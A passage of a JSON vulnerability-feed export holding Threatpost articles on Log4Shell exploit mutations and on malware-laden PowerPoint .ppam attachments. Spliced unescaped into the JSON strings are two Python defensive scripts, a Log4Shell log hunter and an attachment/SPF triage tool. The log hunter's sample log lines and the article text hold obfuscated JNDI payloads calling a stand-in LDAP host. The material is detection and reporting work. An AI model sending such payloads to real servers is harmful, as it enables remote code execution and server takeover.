"THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:10:35", "description": "The internet has a fast-spreading, malignant cancer \u2013 otherwise known as the Apache Log4j logging library exploit \u2013 that\u2019s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.\n\nMost of the attacks focus on cryptocurrency mining done on victims\u2019 dimes, as seen by 
[Sophos](<https://twitter.com/SophosLabs/status/1470213371521810432>), [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&epi=TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA&irgwc=1&OCID=AID2200057_aff_7593_1243925&tduid=%28ir__cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600%29%287593%29%281243925%29%28TnL5HPStwNw-nTRXUjz5ulspb4eSb08quA%29%28%29&irclickid=_cypaumpgf9kf6hvtats20idnqu2xoijddhze9dj600>) and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.\n\nAccording to [Microsoft](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) researchers, beyond coin-miners, they\u2019ve also seen installations of [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.\n\nAlso, it could get a lot worse. Cybersecurity researchers at [Check Point warned](<https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/>) on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.\n\n\u201cSince Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,\u201d they said.\n\nThe flaw, which is uber-easy to exploit, has been named [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>). It\u2019s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. 
It first turned up on sites that cater to users of the world\u2019s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.\n\n## Mutations May Enable Exploits to Slip Past Protections\n\nOn Monday, Check Point reported that Log4Shell\u2019s new, malignant offspring can now be exploited \u201ceither over HTTP or HTTPS (the encrypted version of browsing),\u201d they said.\n\nThe more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. \u201cIt means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,\u201d they wrote.\n\nBecause of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 [Shellshock](<https://threatpost.com/major-bash-vulnerability-affects-linux-unix-mac-os-x/108521/>) family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.\n\n## Tactical Shifts\n\nBesides variations that can slip past protections, researchers are also seeing new tactics.\n\nLuke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to \u201cbingsearchlib[.]com,\u201d with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.\n\nBut since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. 
Notably, there\u2019s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.\n\n\u201cThis originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,\u201d Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JNDI) lookup string itself, by taking advantage of the other lookups Log4j substitutes into a message (such as lower, or env with a default value) before the jndi lookup is evaluated.\n\nHe offered these examples:\n\n${jndi:${lower:l}${lower:d}a${lower:p}://world80 \n${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}// \n${jndi:dns://\n\n\u2026All of which achieve the same objective: \u201cto download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,\u201d Richards said.\n\n## Bug Has Been Targeted All Month\n\nAttackers have been buzzing around the Log4Shell vulnerability since at least Dec. 
1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.\n\nOn Sunday, Sophos researchers [said](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1470213367142965254%7Ctwgr%5E%7Ctwcon%5Es1_c10&ref_url=https%3A%2F%2Fkasperskycontenthub.com%2Fthreatpost-global%2Fwp-admin%2Fpost-new.php>) that they\u2019d \u201calready detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,\u201d noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.\n\n> Sophos has already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability, and log searches by other organizations (including Cloudflare) suggest the vulnerability may have been openly exploited for weeks. 11/16 [pic.twitter.com/dbAXG5WdZ8](<https://t.co/dbAXG5WdZ8>)\n> \n> \u2014 SophosLabs (@SophosLabs) [December 13, 2021](<https://twitter.com/SophosLabs/status/1470213367142965254?ref_src=twsrc%5Etfw>)\n\n\u201cEarliest evidence we\u2019ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,\u201d Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) on Saturday. \u201cThat suggests it was in the wild at least nine days before publicly disclosed. However, don\u2019t see evidence of mass exploitation until after public disclosure.\u201d\n\nOn Sunday, Cisco Talos [chimed in](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>) with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. 
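The lookup nesting in the three strings quoted above is what defeats a naive `${jndi:` signature: Log4j resolves the innermost lookups first, so `${lower:l}` becomes `l` and an unset `${env:ENV_NAME:-j}` falls back to its default `j` before the outer lookup is ever examined. The Python below is an added example, not code from Threatpost or Vectra. It resolves those lookups the same way over a handful of constructed access-log lines (addresses, timestamps and the port-1389 callback host are invented), flags any request whose decoded URI, referer or User-Agent reaches `${jndi:`, and restricts the search to the early-December window that the Cloudflare and Talos observations suggest hunting back to.

```python
import re
from datetime import datetime, timezone
from typing import Dict, List

# Constructed sample access-log lines (Apache combined format, User-Agent last).
# Addresses, timestamps and the port-1389 callback host are invented; three
# lines carry Log4Shell probes of the kinds quoted above, the fourth is benign.
SAMPLE_LOG = """\
203.0.113.10 - - [02/Dec/2021:11:20:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"
203.0.113.11 - - [10/Dec/2021:22:01:03 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:${lower:l}${lower:d}a${lower:p}://203.0.113.99:1389/x}"
203.0.113.12 - - [11/Dec/2021:09:15:44 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//203.0.113.99:1389/y}"
198.51.100.5 - - [11/Dec/2021:09:16:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Hunting window: Cloudflare and Talos saw the first probes on Dec. 1 and 2.
HUNT_SINCE = datetime(2021, 12, 1, tzinfo=timezone.utc)

INNERMOST = re.compile(r"\$\{([^${}]*)\}")   # a lookup with no lookup nested inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:", re.IGNORECASE)


def _resolve(m: "re.Match") -> str:
    """Resolve one innermost lookup as Log4j would on a host where the named
    variables are unset: lower/upper transform their argument, any lookup with a
    ':-' default collapses to that default, and a jndi lookup is left in place."""
    body = m.group(1)
    key, _, arg = body.partition(":")
    key = key.strip().lower()
    if key == "jndi":
        return m.group(0)
    if key == "lower":
        return arg.lower()
    if key == "upper":
        return arg.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return m.group(0)                          # unknown lookup: leave it for a human


def normalize_lookups(s: str, max_rounds: int = 32) -> str:
    """Peel nested lookups from the inside out until nothing more resolves."""
    for _ in range(max_rounds):
        resolved = INNERMOST.sub(_resolve, s)
        if resolved == s:
            break
        s = resolved
    return s


LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" \d{3} \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def hunt(log_text: str, since: datetime = HUNT_SINCE) -> List[Dict[str, str]]:
    """Return one hit per request whose decoded URI, referer or User-Agent
    contains a jndi lookup, for requests at or after `since`."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
        if ts < since:
            continue
        for field in ("req", "ref", "ua"):
            decoded = normalize_lookups(m.group(field))
            j = JNDI.search(decoded)
            if j:
                hits.append({"ip": m.group("ip"), "time": ts.isoformat(), "field": field,
                             "scheme": j.group(1).lower(), "decoded": decoded})
                break
    return hits


if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["field"], hit["scheme"], hit["decoded"])
```

Unknown lookups are deliberately left in place rather than guessed at, so a field that still contains `${` after normalization is itself worth a look; the window starts at Dec. 1 inclusive, so widen HUNT_SINCE to whatever your log retention allows.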
\u201cIt is recommended that organizations expand their hunt for scanning and exploit activity to this date,\u201d it advised.\n\n## Exploits Attempted on 40% of Corporate Networks\n\nCheck Point said on Monday that it\u2019s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it\u2019s seen more than 100 attempts to exploit the vulnerability per minute.\n\nAs of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.\n\nThe map below illustrates the top targeted geographies.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/13121325/map.jpg>)\n\nTop affected geographies. Source: Check Point.\n\nHyperbole isn\u2019t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: \u201cIt wouldn\u2019t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,\u201d Dali noted via email on Monday. \u201cConnecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren\u2019t taken right away.\u201d\n\nAs has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability \u201cis relatively easy to exploit, and we\u2019ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,\u201d Dali reiterated. \u201cHopefully every organization running Java has the ability to secure, configure and manage it. 
If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.\u201d\n\nThis situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we\u2019ve seen, along with some of the new protections and detection tools.\n\n## More News\n\n * ** **[**Linux botnets have already exploited the flaw.**](<https://securityaffairs.co/wordpress/125562/malware/linux-botnets-log4shell-flaw.html?utm_source=feedly&utm_medium=rss&utm_campaign=linux-botnets-log4shell-flaw>) [NetLab 360](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) reported on Saturday that two of its honeypots have been attacked by the [Muhstik](<https://threatpost.com/muhstik-botnet-attacks-tomato-routers/152079/>) and [Mirai](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) botnets. Following detection of those attacks, the Netlab 360 team found [other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>) on the hunt for the Log4Shell vulnerability, including the DDoS family Elknot, the mining family m8220, SitesLoader, xmrig.pe, xmring.ELF, attack tool 1, attack tool 2, plus one unknown and a PE family. 
[BleepingComputer](<https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/>) also reports that it\u2019s observed the threat actors behind the [Kinsing](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) backdoor and cryptomining botnet \u201cheavily abusing the Log4j vulnerability.\u201d\n * [**CISA has added Log4Shell to the Known Exploited Vulnerabilities Catalog**](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog>).\n * [**Quebec shut down thousands of sites**](<https://securityaffairs.co/wordpress/125556/hacking/quebec-shut-down-sites-log4shell.html?utm_source=feedly&utm_medium=rss&utm_campaign=quebec-shut-down-sites-log4shell>) after disclosure of the Log4Shell flaw. \u201cWe need to scan all of our systems,\u201d said Quebec Minister Responsible for Digital Transformation and Access to Information Eric Caire in a news conference. \u201cWe\u2019re kind of looking for a needle in a haystack.\u201d\n\n## New Protections, Detection Tools\n\n * On Saturday, Huntress Labs released a tool \u2013 [available here](<https://log4shell.huntress.com/>) \u2013 to help organizations test whether their applications are vulnerable to CVE-2021-44228.\n * Cybereason released [Logout4Shell](<https://github.com/apache/logging-log4j2/pull/608>), a \u201cvaccine\u201d for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.\n\n## Growing List of Affected Manufacturers, Components\n\nAs of Monday, the internet was still scrambling, with an ever-growing, crowd-sourced list [hosted on GitHub](<https://github.com/YfryTchsGD/Log4jAttackSurface>) that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. 
The list indicates whether they\u2019re affected by Log4Shell and provides links to evidence if they are.\n\nSpoiler alert: Most are, including:\n\n * [Amazon](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Amazon.md>)\n * [Apache Druid](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheDruid.md>)\n * [Apache Solr](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheSolr.md>)\n * [Apache Struts2](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ApacheStruts2.md>)\n * [Apple](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/apple.md>)\n * [Baidu](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Baidu.md>)\n * [CloudFlare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/CloudFlare.md>)\n * [DIDI](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/DIDI.md>)\n * [ElasticSearch](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/ElasticSearch.md>)\n * [Google](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Google.md>)\n * [JD](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/JD.md>)\n * [LinkedIn](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/LinkedIn.md>)\n * [NetEase](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/NetEase.md>)\n * [Speed camera LOL](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/SpeedCamera.md>)\n * [Steam](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Steam.md>)\n * [Tesla](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tesla.md>)\n * [Tencent](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Tencent.md>)\n * [Twitter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Twitter.md>)\n * [VMWare](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWare.md>)\n * 
[VMWarevCenter](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/VMWarevCenter.md>)\n * [Webex](<https://github.com/YfryTchsGD/Log4jAttackSurface/blob/master/pages/Webex.md>)\n\n## A Deep Dive and Other Resources\n\n * **Immersive Labs** has posted a[ hands-on lab](<https://www.linkedin.com/posts/immersive-labs-limited_in-december-a-zero-day-vulnerability-affecting-activity-6876088019028336640-MtYh>) of the incident.\n * **Lacework** has published a [blog post ](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>) regarding how the news affects security best practices at the developer level.\n * **NetSPI** has published a [blog post](<https://www.netspi.com/blog/executive/security-industry-trends/log4j-zero-day-vulnerability-impact/>) that includes details on Log4Shell\u2019s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.\n\nThis is a developing story \u2013 stay tuned to Threatpost for ongoing coverage.\n\n121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards. \n121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats._**[ **_REGISTER TODAY_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This_**[ **_LIVE, interactive Threatpost Town Hall_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)**_, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken. \n_** \n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:14:46", "type": "threatpost", "title": "Log4Shell Is Spawning Even Nastier Mutations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:14:46", "id": "THREATPOST:34D98758A035C36FED68DDD940415845", "href": 
"https://threatpost.com/apache-log4j-log4shell-mutations/176962/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Attackers are using an under-the-radar PowerPoint file to hide malicious executables that can rewrite Windows registry settings to take over an end user\u2019s computer, researchers have found.\n\nIt\u2019s one of a number of stealthy ways threat actors recently have been targeting desktop users through trusted applications they use daily, using emails that are designed to evade security detections and appear legitimate.\n\nNew research from Avanan, a Check Point company, has uncovered how a \u201clittle-known add-on\u201d in PowerPoint \u2013 the .ppam file \u2013 is being used to hide malware. Jeremy Fuchs, cybersecurity researcher and analyst at Avanan, wrote in [a report published](<https://www.avanan.com/blog/using-.ppam-files-to-wrap-executable-content>) Thursday that the file has bonus commands and custom macros, among other functions.\n\nBeginning in January, researchers observed attackers delivering socially engineered emails that include .ppam file attachments with malicious intent.\n\n## **Email Attack Vector**\n\nOne email observed in the campaign, for example, purported to be sending the recipient a purchase order. The attached .ppam file \u2013 named PO04012022 to appear legitimate \u2013 included a malicious executable, Fuchs said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03084259/email-posing-as-PO-e1643895792498.jpg>)\n\nMalicious email posing as standard purchase order. 
Source: Avanan.\n\nThe payload executed a number of functions on the end user\u2019s machine that were not authorized by the user, including installing new programs that create and open new processes, changing file attributes, and dynamically calling imported functions.\n\n\u201cBy combining the potential urgency of a purchase order email, along with a dangerous file, this attack packs a one-two punch that can devastate an end-user and a company,\u201d Fuchs wrote.\n\nThe campaign allows attackers to bypass a computer\u2019s existing security \u2013 in this case, security provided by Google \u2013 with a file that\u2019s rarely used and thus won\u2019t trip an email scanner, he said.\n\n\u201cPlus, it shows the potential dangers of this file, as it can be used to wrap any sort of malicious file, including ransomware,\u201d Fuchs wrote.\n\nIndeed, in October, reports surfaced that attackers were using .ppam files to wrap ransomware, he said, citing [a report](<https://www.pcrisk.com/removal-guides/14314-ppam-ransomware#:~:text=Discovered%20by%20Petrovic%2C%20Ppam%20is,placing%20it%20in%20all%20folders.>) on the Ppam ransomware published in October by the cybersecurity portal [PCrisk](<https://www.pcrisk.com/>).\n\n## **Targeting Desktop Users**\n\nThe latest scam is one of several new email-based campaigns uncovered by researchers recently to target desktop users working on commonly used word-processing and collaboration apps like Microsoft Office, Google Docs and Adobe Creative Cloud. Attackers typically use email to deliver malicious files or links that steal user information.\n\nIn November, reports surfaced that scammers were using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) to trick users into clicking on malicious links in emails or push notifications that invited people to share a Google document. 
The links directed users to websites that stole their credentials.\n\nThen a wave of phishing attacks that Avanan researchers [identified in December](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>) targeted mainly Outlook users, leveraging the \u201cComments\u201d feature of Google Docs to send malicious links that also lifted credentials from victims.\n\nLast month, the Avanan team reported on another scam that researchers observed in December in which threat actors were found [creating accounts within the Adobe Cloud suite](<https://threatpost.com/adobe-cloud-steal-office-365-gmail-credentials/177625/>) and sending images and PDFs that appear legitimate but instead deliver malware to Office 365 and Gmail users.\n\n## **Mitigations and Prevention**\n\nTo keep email scams from reaching corporate users, Fuchs recommended some typical precautions to security administrators that should be implemented consistently.\n\nOne is to install email protection that downloads all files into a sandbox and inspects them for malicious content. Another is to take extra security steps \u2013 such as dynamically analyzing emails for indicators of compromise (IoCs) \u2013 to ensure the safety of messages coming into the corporate network, he said.\n\n\u201cThis email failed an SPF check and there was an insignificant historical reputation with the sender,\u201d Fuchs wrote of the phishing message observed by Avanan researchers. 
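Two of the checks named above can be run statically before a message reaches a mailbox: whether the attachment is an OOXML container carrying a VBA project, whatever extension it wears, and whether the sending IP is authorized by the MAIL FROM domain's SPF record. The Python below is an added example, not Avanan's tooling. It builds a minimal .ppam-shaped archive in memory (a stand-in for the PO04012022 attachment, with placeholder bytes in place of a real vbaProject.bin), classifies it by the content types declared inside the zip rather than by filename, and evaluates a constructed SPF record table offline (the domains supplier.example and mail.example and every address are invented). The SPF evaluator covers only the ip4, ip6, include and all mechanisms.

```python
import io
import ipaddress
import xml.etree.ElementTree as ET
import zipfile
from typing import Dict, List

CT_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"
VBA_TYPE = "application/vnd.ms-office.vbaProject"
PPAM_MAIN = "application/vnd.ms-powerpoint.addin.macroEnabled.main+xml"
PPTX_MAIN = "application/vnd.openxmlformats-officedocument.presentationml.presentation.main+xml"


def triage_attachment(data: bytes) -> Dict[str, object]:
    """Classify an Office attachment by what is inside the zip, not by its extension."""
    r = {"is_ooxml": False, "main_part_type": None, "macro_enabled": False,
         "is_addin": False, "vba_project": False, "suspicious": False}
    if not data.startswith(b"PK\x03\x04"):
        return r
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
        names = zf.namelist()
        if "[Content_Types].xml" not in names:
            return r
        types = ET.fromstring(zf.read("[Content_Types].xml"))
    except (zipfile.BadZipFile, ET.ParseError):
        return r
    r["is_ooxml"] = True
    # Every part is typed in [Content_Types].xml: the main part's type ends in
    # .main+xml and a VBA project (vbaProject.bin) carries its own content type.
    for el in list(types.iter(CT_NS + "Override")) + list(types.iter(CT_NS + "Default")):
        ctype = el.get("ContentType", "")
        if ctype.endswith(".main+xml"):
            r["main_part_type"] = ctype
        if ctype == VBA_TYPE:
            r["vba_project"] = True
    main = r["main_part_type"] or ""
    r["macro_enabled"] = ".macroEnabled." in main
    r["is_addin"] = ".addin.macroEnabled." in main
    r["vba_project"] = r["vba_project"] or any(n.lower().endswith("vbaproject.bin") for n in names)
    r["suspicious"] = r["vba_project"] or r["macro_enabled"]
    return r


def build_sample(main_type: str, with_vba: bool) -> bytes:
    """Construct a minimal OOXML container in memory; a stand-in for a real attachment."""
    parts = [("/ppt/presentation.xml", main_type)] + ([("/ppt/vbaProject.bin", VBA_TYPE)] if with_vba else [])
    ct = ['<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">',
          '<Default Extension="xml" ContentType="application/xml"/>']
    ct += [f'<Override PartName="{p}" ContentType="{t}"/>' for p, t in parts] + ["</Types>"]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "".join(ct))
        zf.writestr("ppt/presentation.xml", "<presentation/>")
        if with_vba:
            zf.writestr("ppt/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder, not a real VBA project")
    return buf.getvalue()


# Constructed TXT table so the SPF check runs offline; domains and addresses are invented.
TXT: Dict[str, List[str]] = {
    "supplier.example": ["v=spf1 ip4:192.0.2.0/24 include:mail.example -all"],
    "mail.example": ["v=spf1 ip4:198.51.100.10 ip6:2001:db8::/32 ~all"],
}
VERDICT = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}


def spf_check(domain: str, sender_ip: str, txt: Dict[str, List[str]] = TXT, depth: int = 0) -> str:
    """Evaluate an SPF record for sender_ip (ip4, ip6, include and all only;
    a, mx, exists, redirect and macros are out of scope for this example)."""
    if depth > 10:                               # RFC 7208 lookup limit
        return "permerror"
    records = [r for r in txt.get(domain, []) if r.startswith("v=spf1 ")]
    if len(records) != 1:
        return "none" if not records else "permerror"
    ip = ipaddress.ip_address(sender_ip)
    for term in records[0].split()[1:]:
        qual = term[0] if term[0] in VERDICT else "+"
        mech = term.lstrip("+-~?").lower()
        if mech == "all":
            return VERDICT[qual]
        if mech.startswith(("ip4:", "ip6:")) and ip in ipaddress.ip_network(mech[4:], strict=False):
            return VERDICT[qual]
        if mech.startswith("include:") and spf_check(mech[8:], sender_ip, txt, depth + 1) == "pass":
            return VERDICT[qual]
    return "neutral"                             # no mechanism matched


def triage_message(mail_from_domain: str, sender_ip: str, attachment: bytes) -> Dict[str, object]:
    """Combine the two checks into one quarantine decision for a message."""
    att = triage_attachment(attachment)
    spf = spf_check(mail_from_domain, sender_ip)
    return {"spf": spf, "attachment": att, "quarantine": bool(att["suspicious"]) or spf == "fail"}


if __name__ == "__main__":
    ppam = build_sample(PPAM_MAIN, with_vba=True)
    print(triage_message("supplier.example", "203.0.113.77", ppam))
```

The attachment check keys on the `.macroEnabled.` main part type and on the VBA part, so a .ppam renamed to .pptx or .zip is classified the same way; an SPF softfail is reported but not quarantined on its own, which matches how most receivers treat `~all`.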
SPF, Sender Policy Framework, is an email authentication technique used to prevent spammers and other bad actors from sending messages spoofed to come from another domain name.\n\nCorporations also should continuously encourage end users in their networks to contact their IT department if they see an unfamiliar file come over via email, he added.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T14:00:25", "type": "threatpost", "title": "PowerPoint Files Abused to Take Over Computers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T14:00:25", "id": "THREATPOST:CF3033203781AAC4EAAE83DDCF93ADE8", "href": "https://threatpost.com/powerpoint-abused-take-over-computers/178182/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 